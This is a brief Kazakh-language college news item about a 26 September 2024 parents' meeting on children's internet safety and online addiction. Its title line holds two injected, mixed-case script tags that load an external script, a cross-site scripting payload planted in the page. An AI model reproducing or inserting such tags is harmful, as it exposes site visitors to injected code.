БІРТҰТАС ТӘРБИЕ БАҒДАРЛАМАСЫ<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
27.09.2024
БІРТҰТАС ТӘРБИЕ БАҒДАРЛАМАСЫ
2024 жылдың 26 қыркүйек күні Ж.Мусин атындағы Көкшетау жоғары қазақ педагогикалық колледжінде 0101000 «Мектепке дейінгі тәрбие және оқыту», 01130100 «Логопедия» мамандықтары бойынша «Баланың интернеттегі қауіпсіздігін қамтамасыз ету жолдары» тақырыбында ата-аналар жиналысы өтті. Ата-аналар жиналысында «Интернеттегі тәуелділікті қалай анықтауға болады?», «Адамды желіде шексіз саяхаттауға не мәжбүрлейді?» мәселелері қозғалды. Аталмыш жиналысқа бөлім меңгерушісі Н.Мұқышева және колледж психологы Д.Испаева қатысты. Бөлім бойынша 170-ке жуық ата-ана қатысып, сұрақтар алмасып, ақпарат алу мүмкіндігіне ие болды.
Просмотров: 588